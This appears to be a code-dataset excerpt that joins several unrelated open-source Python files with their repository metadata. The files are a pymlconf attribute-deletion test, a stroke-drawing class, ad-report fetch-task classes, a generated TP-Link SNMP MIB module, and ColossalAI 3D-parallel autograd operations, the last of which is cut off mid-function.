] | 23 | 2015-06-05T07:30:18.000Z | 2020-05-26T17:45:46.000Z | tests/test_delattribute.py | pylover/pymlconf | 4111ed84b23201957ee789b58e6818f330eeb28b | [
"MIT"
] | 5 | 2016-02-19T14:22:28.000Z | 2018-08-06T14:04:44.000Z | import pytest
from pymlconf import Root
def test_delattribute():
root = Root('''
app:
name: MyApp
''')
assert hasattr(root.app, 'name')
del root.app.name
assert not hasattr(root.app, 'name')
with pytest.raises(AttributeError):
del root.app.invalidattribute
| 17.333333 | 40 | 0.625 | 37 | 312 | 5.243243 | 0.513514 | 0.180412 | 0.226804 | 0.185567 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.266026 | 312 | 17 | 41 | 18.352941 | 0.847162 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.083333 | false | 0 | 0.166667 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f80e14d31ba59b5772064b17b1e2d0d9764b5671 | 2,022 | py | Python | src/xie/graphics/stroke.py | xrloong/Xie | c45c454b4467d91e242a84fda665b67bd3d43ca9 | [
"Apache-2.0"
] | null | null | null | src/xie/graphics/stroke.py | xrloong/Xie | c45c454b4467d91e242a84fda665b67bd3d43ca9 | [
"Apache-2.0"
] | null | null | null | src/xie/graphics/stroke.py | xrloong/Xie | c45c454b4467d91e242a84fda665b67bd3d43ca9 | [
"Apache-2.0"
] | null | null | null | from .shape import Shape, Pane
from .stroke_path import StrokePath
from . import DrawingSystem
class StrokePosition:
def __init__(self, startPoint, statePane: Pane = None):
self.startPoint = startPoint
self.statePane = statePane
def transform(self, fromPane, toPane):
newStatePane = fromPane.transformRelativePaneByTargetPane(self.statePane, toPane)
newStartPoint = fromPane.transformRelativePointByTargetPane(self.startPoint, toPane)
return StrokePosition(newStartPoint, newStatePane)
class Stroke(Shape):
def __init__(self, typeName, path: StrokePath, strokePosition: StrokePosition):
self.typeName = typeName
self.path = path
self.strokePosition = strokePosition
def getStartPoint(self):
return self.strokePosition.startPoint
def getTypeName(self):
return self.typeName
def getName(self):
return self.getTypeName()
def getStrokePath(self):
return self.path
def getInfoPane(self):
return self.path.getPane()
def getStatePane(self):
return self.strokePosition.statePane
def draw(self, drawingSystem: DrawingSystem):
startPoint = self.getStartPoint()
stroke=self
drawingSystem.onPreDrawStroke(stroke)
drawingSystem.save()
infoPane = stroke.getInfoPane()
statePane = stroke.getStatePane()
drawingSystem.translate(-startPoint[0], -startPoint[1])
drawingSystem.translate(-infoPane.centerX, -infoPane.centerY)
if infoPane.width != 0:
drawingSystem.scale(statePane.width/infoPane.width, 1)
if infoPane.height != 0:
drawingSystem.scale(1, statePane.height/infoPane.height)
drawingSystem.translate(statePane.centerX, statePane.centerY)
drawingSystem.startDrawing()
drawingSystem.moveTo(startPoint)
drawingSystem.draw(stroke.getStrokePath())
drawingSystem.endDrawing()
drawingSystem.restore()
drawingSystem.onPostDrawStroke(stroke)
def transform(self, fromComponentPane, toComponentPane):
strokePosition = self.strokePosition.transform(fromComponentPane, toComponentPane)
return Stroke(self.typeName, self.path, strokePosition)
| 28.478873 | 86 | 0.786845 | 203 | 2,022 | 7.793103 | 0.256158 | 0.037927 | 0.053097 | 0.035398 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003365 | 0.1182 | 2,022 | 70 | 87 | 28.885714 | 0.883904 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.215686 | false | 0 | 0.058824 | 0.117647 | 0.470588 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
f81e877f703a45f50e56f90f169d90c0d93ffb11 | 7,065 | py | Python | tasks/tasks_fetch_entity.py | xyla-io/almacen | 7b7f235dc7939777f971f1b5eadd5621e980c15e | [
"MIT"
] | 2 | 2020-10-15T22:12:17.000Z | 2020-10-26T07:17:17.000Z | tasks/tasks_fetch_entity.py | xyla-io/almacen | 7b7f235dc7939777f971f1b5eadd5621e980c15e | [
"MIT"
] | null | null | null | tasks/tasks_fetch_entity.py | xyla-io/almacen | 7b7f235dc7939777f971f1b5eadd5621e980c15e | [
"MIT"
] | null | null | null | import models
import re
from . import base
from . import tasks_fetch_currency_exchange
from abc import abstractproperty
from typing import TypeVar, List, Optional
class ParseTagsMutationSpecifier:
parser: Optional[str]
channel: str
entity: str
id_column: str
name_column: str
@classmethod
def task_parser_name(cls, task: base.ReportTask, default_name: Optional[str]=None) -> Optional[str]:
if 'task_tag_parsers' in task.task_set.config and task.task_type.value in task.task_set.config['task_tag_parsers']:
return task.task_set.config['task_tag_parsers'][task.task_type.value]
if default_name is not None:
return default_name
match = re.match(r'^fetch_(.+)s$', task.task_type.value)
if not match:
return None
parts = match.group(1).rpartition('_')
name = '-'.join([parts[0], parts[2]])
return name
def __init__(self, parser: Optional[str], channel: str, entity: str, name_column: str, id_column: str):
self.parser = parser
self.channel = channel
self.entity = entity
self.id_column = id_column
self.name_column = name_column
class LatestValueMutationSpecifier:
identifier_column: str
source_value_column: str
target_value_column: str
only_missing_values: List[any]
def __init__(self, identifier_column: str, source_value_column: str, target_value_column: str, only_missing_values: List[any]=[]):
self.identifier_column = identifier_column
self.source_value_column = source_value_column
self.target_value_column = target_value_column
self.only_missing_values = only_missing_values
class FetchSpendableReportTask(base.FetchReportTask):
@abstractproperty
def fetched_currency_column(self) -> str:
pass
@abstractproperty
def money_columns(self) -> List[str]:
pass
@property
def currency(self) -> str:
return self.task_set.company_metadata.currency
def generate_behaviors(self) -> List[models.ReportTaskBehavior]:
return [
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.mutate,
behavior_subtype=models.ReportTaskBehaviorSubType.mutate_currency_exchange
),
]
def generate_subtasks(self) -> List[TypeVar('ReportTask')]:
if 'currency_exchange' not in self.task_set.config:
return []
return [
tasks_fetch_currency_exchange.FetchCurrencyExchangeReportTask(
task_set=self.task_set,
identifier_prefix=self.identifier
)
]
class FetchCampaignReportTask(FetchSpendableReportTask):
@abstractproperty
def latest_value_mutation_specifiers(self) -> List[LatestValueMutationSpecifier]:
pass
@property
def parse_tags_mutation_specifier(self) -> Optional[ParseTagsMutationSpecifier]:
return None
def generate_behaviors(self) -> List[models.ReportTaskBehavior]:
return [
models.ReportTaskBehavior(models.ReportTaskBehaviorType.run_subtasks),
models.ReportTaskBehavior(models.ReportTaskBehaviorType.fetch_date),
models.ReportTaskBehavior(models.ReportTaskBehaviorType.provide_credentials),
models.ReportTaskBehavior(models.ReportTaskBehaviorType.provide_api),
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.verify,
behavior_subtype=models.ReportTaskBehaviorSubType.before
),
models.ReportTaskBehavior(models.ReportTaskBehaviorType.fetch_report),
models.ReportTaskBehavior(models.ReportTaskBehaviorType.process),
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.process,
behavior_subtype=models.ReportTaskBehaviorSubType.edit
),
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.mutate,
behavior_subtype=models.ReportTaskBehaviorSubType.replace
),
models.ReportTaskBehavior(models.ReportTaskBehaviorType.collect),
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.mutate,
behavior_subtype=models.ReportTaskBehaviorSubType.mutate_currency_exchange
),
*[
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.mutate,
behavior_subtype=models.ReportTaskBehaviorSubType.mutate_latest_column_value,
behavior_subtype_info=s
)
for s in self.latest_value_mutation_specifiers
],
*([models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.mutate,
behavior_subtype=models.ReportTaskBehaviorSubType.mutate_parse_tags,
behavior_subtype_info=self.parse_tags_mutation_specifier
)] if self.parse_tags_mutation_specifier else []),
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.verify,
behavior_subtype=models.ReportTaskBehaviorSubType.after
),
]
class FetchAdReportTask(FetchCampaignReportTask):
@abstractproperty
def ad_name_column(self) -> str:
pass
@abstractproperty
def ad_id_column(self) -> str:
pass
def generate_behaviors(self) -> List[models.ReportTaskBehavior]:
return [
models.ReportTaskBehavior(models.ReportTaskBehaviorType.run_subtasks),
models.ReportTaskBehavior(models.ReportTaskBehaviorType.fetch_date),
models.ReportTaskBehavior(models.ReportTaskBehaviorType.provide_credentials),
models.ReportTaskBehavior(models.ReportTaskBehaviorType.provide_api),
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.verify,
behavior_subtype=models.ReportTaskBehaviorSubType.before
),
models.ReportTaskBehavior(models.ReportTaskBehaviorType.fetch_report),
models.ReportTaskBehavior(models.ReportTaskBehaviorType.process),
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.process,
behavior_subtype=models.ReportTaskBehaviorSubType.edit
),
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.mutate,
behavior_subtype=models.ReportTaskBehaviorSubType.replace
),
models.ReportTaskBehavior(models.ReportTaskBehaviorType.collect),
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.mutate,
behavior_subtype=models.ReportTaskBehaviorSubType.mutate_currency_exchange
),
*[
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.mutate,
behavior_subtype=models.ReportTaskBehaviorSubType.mutate_latest_column_value,
behavior_subtype_info=s
)
for s in self.latest_value_mutation_specifiers
],
*([models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.mutate,
behavior_subtype=models.ReportTaskBehaviorSubType.mutate_parse_tags,
behavior_subtype_info=self.parse_tags_mutation_specifier
)] if self.parse_tags_mutation_specifier else []),
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.verify,
behavior_subtype=models.ReportTaskBehaviorSubType.after
),
] | 38.606557 | 132 | 0.754706 | 684 | 7,065 | 7.539474 | 0.157895 | 0.148924 | 0.093077 | 0.104712 | 0.716502 | 0.705061 | 0.691099 | 0.665115 | 0.665115 | 0.665115 | 0 | 0.00051 | 0.167587 | 7,065 | 183 | 133 | 38.606557 | 0.876382 | 0 | 0 | 0.620482 | 0 | 0 | 0.012737 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.084337 | false | 0.03012 | 0.036145 | 0.03012 | 0.271084 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f81f6b88dfb0bfa0ed2fc6759e1859cc964832d9 | 2,901 | py | Python | pysnmp-with-texts/TPLINK-CLUSTER-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/TPLINK-CLUSTER-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/TPLINK-CLUSTER-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module TPLINK-CLUSTER-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/TPLINK-CLUSTER-MIB
# Produced by pysmi-0.3.4 at Wed May 1 15:24:19 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsIntersection, ConstraintsUnion, SingleValueConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsIntersection", "ConstraintsUnion", "SingleValueConstraint", "ValueRangeConstraint")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
ModuleIdentity, Unsigned32, Counter32, MibIdentifier, iso, ObjectIdentity, NotificationType, Gauge32, MibScalar, MibTable, MibTableRow, MibTableColumn, IpAddress, Counter64, Bits, Integer32, TimeTicks = mibBuilder.importSymbols("SNMPv2-SMI", "ModuleIdentity", "Unsigned32", "Counter32", "MibIdentifier", "iso", "ObjectIdentity", "NotificationType", "Gauge32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "IpAddress", "Counter64", "Bits", "Integer32", "TimeTicks")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
tplinkClusterMIBObjects, = mibBuilder.importSymbols("TPLINK-CLUSTERTREE-MIB", "tplinkClusterMIBObjects")
tplinkClusterMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 11863, 6, 33, 1, 1))
tplinkClusterMIB.setRevisions(('2009-08-27 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: tplinkClusterMIB.setRevisionsDescriptions(('Initial version of this MIB module.',))
if mibBuilder.loadTexts: tplinkClusterMIB.setLastUpdated('200908270000Z')
if mibBuilder.loadTexts: tplinkClusterMIB.setOrganization('TPLINK')
if mibBuilder.loadTexts: tplinkClusterMIB.setContactInfo('www.tplink.com.cn')
if mibBuilder.loadTexts: tplinkClusterMIB.setDescription('Cluster Management function enables a network administer to manage the scattered devices in the network via a management device. After a commander switch is configured, management and maintenance operations intended for the member devices in a cluster is implemented by the commander device. ')
ndpManage = MibIdentifier((1, 3, 6, 1, 4, 1, 11863, 6, 33, 1, 1, 1))
ntdpManage = MibIdentifier((1, 3, 6, 1, 4, 1, 11863, 6, 33, 1, 1, 2))
clusterManage = MibIdentifier((1, 3, 6, 1, 4, 1, 11863, 6, 33, 1, 1, 3))
mibBuilder.exportSymbols("TPLINK-CLUSTER-MIB", clusterManage=clusterManage, tplinkClusterMIB=tplinkClusterMIB, ndpManage=ndpManage, ntdpManage=ntdpManage, PYSNMP_MODULE_ID=tplinkClusterMIB)
| 103.607143 | 477 | 0.783178 | 324 | 2,901 | 7.006173 | 0.438272 | 0.070925 | 0.046256 | 0.081498 | 0.280617 | 0.193392 | 0.193392 | 0.193392 | 0.193392 | 0.193392 | 0 | 0.062524 | 0.090314 | 2,901 | 27 | 478 | 107.444444 | 0.797651 | 0.113754 | 0 | 0 | 0 | 0.052632 | 0.346995 | 0.034738 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.368421 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
f8287f932ae9368561250875bb2b9820c5a3ddda | 23,025 | py | Python | colossalai/nn/layer/parallel_3d/_operation.py | DevinCheung/ColossalAI | 632e622de818697f9949e35117c0432d88f62c87 | [
"Apache-2.0"
] | null | null | null | colossalai/nn/layer/parallel_3d/_operation.py | DevinCheung/ColossalAI | 632e622de818697f9949e35117c0432d88f62c87 | [
"Apache-2.0"
] | null | null | null | colossalai/nn/layer/parallel_3d/_operation.py | DevinCheung/ColossalAI | 632e622de818697f9949e35117c0432d88f62c87 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
from typing import Any, Optional, Tuple
import torch
import torch.distributed as dist
from colossalai.communication import all_gather, all_reduce, reduce_scatter
from colossalai.context.parallel_mode import ParallelMode
from colossalai.core import global_context as gpc
from torch import Tensor
from torch.cuda.amp import custom_bwd, custom_fwd
class linear_3d(torch.autograd.Function):
@staticmethod
@custom_fwd(cast_inputs=torch.float16)
def forward(ctx: Any,
input_: Tensor,
weight: Tensor,
bias: Optional[Tensor],
input_parallel_mode: ParallelMode,
weight_parallel_mode: ParallelMode,
output_parallel_mode: ParallelMode,
input_dim: int = 0,
weight_dim: int = -1,
output_dim: int = 0) -> Tensor:
assert input_.shape[-1] == weight.shape[0], \
'Invalid shapes: input = {}, weight = {}.'.format(input_.shape, weight.shape)
ctx.use_bias = bias is not None
input_ = all_gather(input_, input_dim, input_parallel_mode)
input_ = torch.cat(input_, dim=input_dim)
# weight = all_gather(weight, weight_dim, weight_parallel_mode)
ctx.save_for_backward(input_, weight)
output = torch.matmul(input_, weight)
output = reduce_scatter(output, output_dim, output_parallel_mode)
if bias is not None:
# ranks_in_group = gpc.get_ranks_in_group(output_parallel_mode)
# src_rank = ranks_in_group[gpc.get_local_rank(input_parallel_mode)]
# dist.broadcast(bias,
# src=src_rank,
# group=gpc.get_group(output_parallel_mode))
# bias = all_gather(bias, -1, weight_parallel_mode)
output += bias
# ctx.src_rank = src_rank
# ctx.save_for_backward(input_, weight)
# output = torch.matmul(input_, weight)
# dist.all_reduce(output, group=gpc.get_group(output_parallel_mode))
# output += bias
ctx.input_parallel_mode = input_parallel_mode
ctx.weight_parallel_mode = weight_parallel_mode
ctx.output_parallel_mode = output_parallel_mode
ctx.input_dim = input_dim
ctx.weight_dim = weight_dim
ctx.output_dim = output_dim
return output
@staticmethod
@custom_bwd
def backward(ctx: Any, output_grad: Tensor) -> Tuple[Tensor, ...]:
input_, weight = ctx.saved_tensors
with torch.no_grad():
# input_grad = torch.matmul(output_grad, weight.transpose(0, 1))
# dist.all_reduce(input_grad,
# group=gpc.get_group(ctx.input_parallel_mode))
# weight_grad = torch.matmul(
# input_.reshape(-1, input_.shape[-1]).transpose(0, 1),
# output_grad.reshape(-1, output_grad.shape[-1]))
# dist.all_reduce(weight_grad,
# group=gpc.get_group(ctx.weight_parallel_mode))
# bias_grad = torch.sum(output_grad,
# dim=tuple(
# range(len(output_grad.shape))[:-1]))
# bias_grad = reduce_scatter(bias_grad, -1,
# ctx.weight_parallel_mode)
# dist.reduce(bias_grad,
# dst=ctx.src_rank,
# group=gpc.get_group(ctx.output_parallel_mode))
# if gpc.get_local_rank(
# ctx.output_parallel_mode) != gpc.get_local_rank(
# ctx.input_parallel_mode):
# bias_grad = None
# input_ = all_gather(input_, ctx.input_dim, ctx.input_parallel_mode)
# weight = all_gather(weight, ctx.weight_dim,
# ctx.weight_parallel_mode)
output_grad = all_gather(output_grad, ctx.output_dim,
ctx.output_parallel_mode)
output_grad = torch.cat(output_grad, dim=ctx.output_dim)
input_grad = torch.matmul(output_grad, weight.transpose(0, 1))
input_grad, input_op = reduce_scatter(input_grad, ctx.input_dim,
ctx.input_parallel_mode,
async_op=True)
weight_grad = torch.matmul(
input_.reshape(-1, input_.shape[-1]).transpose(0, 1),
output_grad.reshape(-1, output_grad.shape[-1]))
# weight_grad = torch.matmul(
# input_.reshape(-1, input_.shape[-1]).transpose(0, 1),
# output_grad.reshape(-1, output_grad.shape[-1]))
# weight_grad = reduce_scatter(weight_grad, ctx.weight_dim,
# ctx.weight_parallel_mode)
if ctx.use_bias:
bias_grad = torch.sum(output_grad,
dim=tuple(
range(len(output_grad.shape))[:-1]))
# bias_grad =all_reduce(bias_grad, ctx.output_parallel_mode)
# dist.all_reduce(bias_grad,
# group=gpc.get_group(ctx.weight_parallel_mode))
weight_grad = torch.cat([weight_grad, torch.unsqueeze(bias_grad, dim=0)])
weight_grad, weight_op = all_reduce(weight_grad, ctx.weight_parallel_mode, async_op=True)
input_op.wait()
weight_op.wait()
if ctx.use_bias:
bias_grad = weight_grad[-1]
weight_grad = weight_grad[:-1]
return input_grad, weight_grad, bias_grad, None, None, None, None, None, None
class layer_norm_3d(torch.autograd.Function):
@staticmethod
@custom_fwd(cast_inputs=torch.float16)
def forward(ctx: Any, input_: Tensor, weight: Tensor, bias: Tensor,
normalized_shape: int, eps: float,
input_parallel_mode: ParallelMode,
weight_parallel_mode: ParallelMode,
output_parallel_mode: ParallelMode) -> Tensor:
# mean = torch.sum(input_, dim=-1)
# dist.all_reduce(mean, group=gpc.get_group(output_parallel_mode))
# mean /= normalized_shape
# mu = input_ - mean
# var = torch.sum(torch.pow(mu, 2), dim=-1)
# dist.all_reduce(var, group=gpc.get_group(output_parallel_mode))
# var /= normalized_shape
# std_dev = torch.sqrt(var + eps)
# ctx.save_for_backward(input_, mu, std_dev, weight)
# output = weight * mu / std_dev + bias
mean = all_reduce(torch.sum(input_, dim=-1, keepdim=True),
output_parallel_mode) / normalized_shape
mu = input_ - mean
var = all_reduce(torch.sum(mu**2, dim=-1, keepdim=True),
output_parallel_mode) / normalized_shape
sigma = torch.sqrt(var + eps)
# ranks_in_group = gpc.get_ranks_in_group(input_parallel_mode)
# src_rank = ranks_in_group[gpc.get_local_rank(output_parallel_mode)]
# transforms = torch.stack([weight, bias]).contiguous()
# dist.broadcast(transforms,
# src=src_rank,
# group=gpc.get_group(input_parallel_mode))
# transforms = all_gather(transforms, -1, weight_parallel_mode)
# weight, bias = transforms[0], transforms[1]
ctx.save_for_backward(mu, sigma, weight)
z = mu / sigma
output = weight * z + bias
# ctx.src_rank = src_rank
ctx.normalized_shape = normalized_shape
ctx.input_parallel_mode = input_parallel_mode
ctx.weight_parallel_mode = weight_parallel_mode
ctx.output_parallel_mode = output_parallel_mode
return output
@staticmethod
@custom_bwd
def backward(ctx: Any, output_grad: Tensor) -> Tuple[Tensor, ...]:
mu, sigma, weight = ctx.saved_tensors
with torch.no_grad():
bias_grad, weight_grad = output_grad, output_grad * mu / sigma
grads = torch.stack([bias_grad, weight_grad]).contiguous()
grads = torch.sum(grads, dim=tuple(range(len(grads.shape))[1:-1]))
grads = all_reduce(grads, ctx.weight_parallel_mode)
grads = all_reduce(grads, ctx.input_parallel_mode)
bias_grad, weight_grad = grads[0], grads[1]
# grads = reduce_scatter(grads, -1, ctx.weight_parallel_mode)
# dist.reduce(grads,
# dst=ctx.src_rank,
# group=gpc.get_group(ctx.input_parallel_mode))
# if gpc.get_local_rank(
# ctx.input_parallel_mode) == gpc.get_local_rank(
# ctx.output_parallel_mode):
# bias_grad, weight_grad = grads[0], grads[1]
# else:
# bias_grad, weight_grad = None, None
dz = output_grad * weight
dvar = dz * mu * (-0.5) * sigma**(-3)
dvar = all_reduce(torch.sum(dvar, dim=-1, keepdim=True), ctx.output_parallel_mode)
dmean = dz * (-1 / sigma) + dvar * -2 * mu / ctx.normalized_shape
dmean = all_reduce(torch.sum(dmean, dim=-1, keepdim=True), ctx.output_parallel_mode)
input_grad = dz / sigma + dvar * 2 * mu / ctx.normalized_shape + dmean / ctx.normalized_shape
return input_grad, weight_grad, bias_grad, None, None, None, None, None
class Matmul_AB_3D(torch.autograd.Function):
"""Matrix multiplication for :math:`C = AB`
"""
@staticmethod
@custom_fwd(cast_inputs=torch.float16)
def forward(ctx: Any,
A: Tensor,
B: Tensor,
depth: int,
input_parallel_mode: ParallelMode,
weight_parallel_mode: ParallelMode,
output_parallel_mode: ParallelMode,
input_dim: int = 0,
weight_dim: int = -1,
output_dim: int = 0) -> Tensor:
# A: [m/q^2, n, k/q]
# B: [k/q, h/q^2]
# C: [m/q^2, n, h/q]
ctx.save_for_backward(A, B)
assert A.shape[-1] == B.shape[0], \
'Invalid shapes: A={}, B={}.'.format(A.shape, B.shape)
A_temp = all_gather(A, input_dim, input_parallel_mode)
B_temp = all_gather(B, weight_dim, weight_parallel_mode)
C = torch.matmul(A_temp, B_temp)
out = reduce_scatter(C, output_dim, output_parallel_mode)
ctx.depth = depth
ctx.A_group_parallel_mode = input_parallel_mode
ctx.B_group_parallel_mode = weight_parallel_mode
ctx.C_group_parallel_mode = output_parallel_mode
ctx.A_dim = input_dim
ctx.B_dim = weight_dim
ctx.C_dim = output_dim
return out
@staticmethod
@custom_bwd
def backward(ctx: Any, output_grad: Tensor) -> Tuple[Tensor, ...]:
A, B = ctx.saved_tensors
with torch.no_grad():
A_grad = Matmul_ABT_3D.apply(output_grad, B, ctx.depth,
ctx.C_group_parallel_mode,
ctx.B_group_parallel_mode,
ctx.A_group_parallel_mode, ctx.C_dim,
ctx.B_dim, ctx.A_dim)
B_grad = Matmul_ATB_3D.apply(A, output_grad, ctx.depth,
ctx.A_group_parallel_mode,
ctx.C_group_parallel_mode,
ctx.B_group_parallel_mode, ctx.A_dim,
ctx.C_dim, ctx.B_dim)
return A_grad, B_grad, None, None, None, None, None, None, None
class Matmul_ABT_3D(torch.autograd.Function):
"""Matrix multiplication for :math:`C = AB^T`
"""
@staticmethod
@custom_fwd(cast_inputs=torch.float16)
def forward(ctx: Any,
A: Tensor,
B: Tensor,
depth: int,
input_parallel_mode: ParallelMode,
weight_parallel_mode: ParallelMode,
output_parallel_mode: ParallelMode,
input_dim: int = 0,
weight_dim: int = -1,
output_dim: int = 0) -> Tensor:
# A: [m/q^2, n, h/q]
# B: [k/q, h/q^2]
# C: [m/q^2, n, k/q]
ctx.save_for_backward(A, B)
A_temp = all_gather(A, input_dim, input_parallel_mode)
B_temp = all_gather(B, weight_dim, weight_parallel_mode)
C = torch.matmul(A_temp, B_temp.transpose(0, 1))
out = reduce_scatter(C, output_dim, output_parallel_mode)
ctx.depth = depth
ctx.A_group_parallel_mode = input_parallel_mode
ctx.B_group_parallel_mode = weight_parallel_mode
ctx.C_group_parallel_mode = output_parallel_mode
ctx.A_dim = input_dim
ctx.B_dim = weight_dim
ctx.C_dim = output_dim
return out
@staticmethod
@custom_bwd
def backward(ctx: Any, output_grad: Tensor) -> Tuple[Tensor, ...]:
A, B = ctx.saved_tensors
with torch.no_grad():
A_grad = Matmul_AB_3D.apply(output_grad, B, ctx.depth,
ctx.C_group_parallel_mode,
ctx.B_group_parallel_mode,
ctx.A_group_parallel_mode, ctx.C_dim,
ctx.B_dim, ctx.A_dim)
B_grad = Matmul_ATB_3D.apply(output_grad, A, ctx.depth,
ctx.C_group_parallel_mode,
ctx.A_group_parallel_mode,
ctx.B_group_parallel_mode, ctx.C_dim,
ctx.A_dim, ctx.B_dim)
return A_grad, B_grad, None, None, None, None, None, None, None
class Matmul_ATB_3D(torch.autograd.Function):
"""Matrix multiplication for :math:`C = A^TB`
"""
@staticmethod
@custom_fwd(cast_inputs=torch.float16)
def forward(ctx: Any,
A: Tensor,
B: Tensor,
depth: int,
input_parallel_mode: ParallelMode,
weight_parallel_mode: ParallelMode,
output_parallel_mode: ParallelMode,
input_dim: int = 0,
weight_dim: int = 0,
output_dim: int = -1) -> Tensor:
# A: [m/q^2, n, k/q]
# B: [m/q^2, n, h/q]
# C: [k/q, h/q^2]
ctx.save_for_backward(A, B)
A_temp = all_gather(A, input_dim, input_parallel_mode)
A_temp = A_temp.reshape(-1, A.shape[-1])
B_temp = all_gather(B, weight_dim, weight_parallel_mode)
B_temp = B_temp.reshape(-1, B.shape[-1])
C = torch.matmul(A_temp.transpose(0, 1), B_temp)
out = reduce_scatter(C, output_dim, output_parallel_mode)
ctx.depth = depth
ctx.A_group_parallel_mode = input_parallel_mode
ctx.B_group_parallel_mode = weight_parallel_mode
ctx.C_group_parallel_mode = output_parallel_mode
ctx.A_dim = input_dim
ctx.B_dim = weight_dim
ctx.C_dim = output_dim
return out
@staticmethod
@custom_bwd
def backward(ctx: Any, output_grad: Tensor) -> Tuple[Tensor, ...]:
A, B = ctx.saved_tensors
with torch.no_grad():
A_grad = Matmul_ABT_3D.apply(B, output_grad, ctx.depth,
ctx.B_group_parallel_mode,
ctx.C_group_parallel_mode,
ctx.A_group_parallel_mode, ctx.B_dim,
ctx.C_dim, ctx.A_dim)
B_grad = Matmul_AB_3D.apply(A, output_grad, ctx.depth,
ctx.A_group_parallel_mode,
ctx.C_group_parallel_mode,
ctx.B_group_parallel_mode, ctx.A_dim,
ctx.C_dim, ctx.B_dim)
return A_grad, B_grad, None, None, None, None, None, None, None
class Add_3D(torch.autograd.Function):
"""Matrix add bias: :math:`C = A + b`
"""
@staticmethod
@custom_fwd(cast_inputs=torch.float16)
def forward(ctx: Any, input_: Tensor, bias: Tensor, depth: int,
input_parallel_mode: ParallelMode,
weight_parallel_mode: ParallelMode,
output_parallel_mode: ParallelMode) -> Tensor:
# input: [m/q^2, n, h/q]
# bias: [h/q^2]
ranks_in_group = gpc.get_ranks_in_group(input_parallel_mode)
src_rank = ranks_in_group[gpc.get_local_rank(output_parallel_mode)]
bias_temp = bias.clone()
dist.broadcast(bias_temp,
src=src_rank,
group=gpc.get_group(input_parallel_mode))
# [h/q]
bias_temp = all_gather(bias_temp, -1, weight_parallel_mode)
out = input_ + bias_temp
ctx.depth = depth
ctx.src_rank = src_rank
ctx.A_group_parallel_mode = input_parallel_mode
